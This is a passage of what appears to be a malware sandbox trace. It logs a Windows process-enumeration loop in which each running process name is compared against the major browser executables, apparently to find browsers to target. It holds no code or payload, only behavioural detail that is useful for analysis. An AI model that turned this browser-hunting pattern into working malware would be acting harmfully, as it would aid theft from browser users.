(lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0251.780] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.780] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.781] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.781] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.781] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.781] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0251.781] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.781] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0251.781] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0251.781] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0251.781] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0251.781] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0251.781] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.781] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.782] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.782] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.782] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.782] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0251.782] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.782] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.783] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.783] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.783] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.783] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0251.783] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.783] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0251.783] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0251.783] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0251.783] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0251.783] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0251.783] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.783] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0251.784] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0251.784] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0251.784] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0251.784] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0251.784] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.784] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0251.784] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0251.784] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0251.784] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0251.784] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0251.784] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.784] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.785] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.785] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.785] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.785] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0251.785] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.785] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0251.786] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0251.786] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0251.786] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0251.786] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0251.786] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.786] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0251.786] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0251.786] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0251.786] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0251.786] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0251.786] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.786] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0251.787] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0251.787] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0251.787] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0251.787] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0251.787] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.787] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0251.787] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0251.787] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0251.787] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0251.787] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0251.788] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.788] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0251.788] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0251.788] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0251.788] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0251.788] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0251.788] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.788] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0251.789] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0251.789] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0251.789] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0251.789] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0251.789] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.789] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0251.789] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0251.789] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0251.789] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0251.789] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0251.789] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.789] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0251.790] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0251.790] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0251.790] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0251.790] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0251.790] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.790] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0251.790] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0251.790] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0251.790] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0251.790] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0251.791] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.791] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0251.791] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0251.791] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0251.791] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0251.791] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0251.791] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.791] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0251.792] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0251.792] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0251.792] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0251.792] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0251.792] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.792] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0251.792] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0251.792] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0251.792] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0251.792] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0251.792] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.792] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0251.793] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0251.793] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0251.793] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0251.793] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0251.793] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.793] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0251.793] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0251.793] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0251.793] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0251.794] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0251.794] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.794] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0251.794] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0251.794] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0251.794] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0251.794] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0251.794] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.794] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0251.795] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0251.795] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0251.795] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0251.795] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0251.795] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.795] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0251.795] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0251.795] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0251.795] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0251.795] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0251.795] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.795] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0251.796] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0251.796] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0251.796] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0251.796] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0251.796] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.796] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0251.796] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0251.796] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0251.796] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0251.796] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0251.796] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.797] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0251.797] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0251.797] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0251.797] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0251.797] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0251.797] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.797] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0251.798] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0251.798] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0251.798] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0251.798] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0251.798] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.798] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0251.798] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0251.798] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0251.798] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0251.798] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0251.798] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.798] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.799] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0251.799] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0251.799] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0251.799] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0251.799] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.799] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.799] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.799] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.799] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.799] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0251.799] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.799] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0251.800] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0251.800] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0251.800] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0251.800] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0251.800] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.800] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.801] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0251.801] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0251.801] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0251.801] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0251.801] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.801] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0251.801] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0251.801] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0251.801] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0251.801] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0251.801] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0251.801] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.802] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0251.802] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0251.802] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0251.802] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0251.802] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0251.802] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, 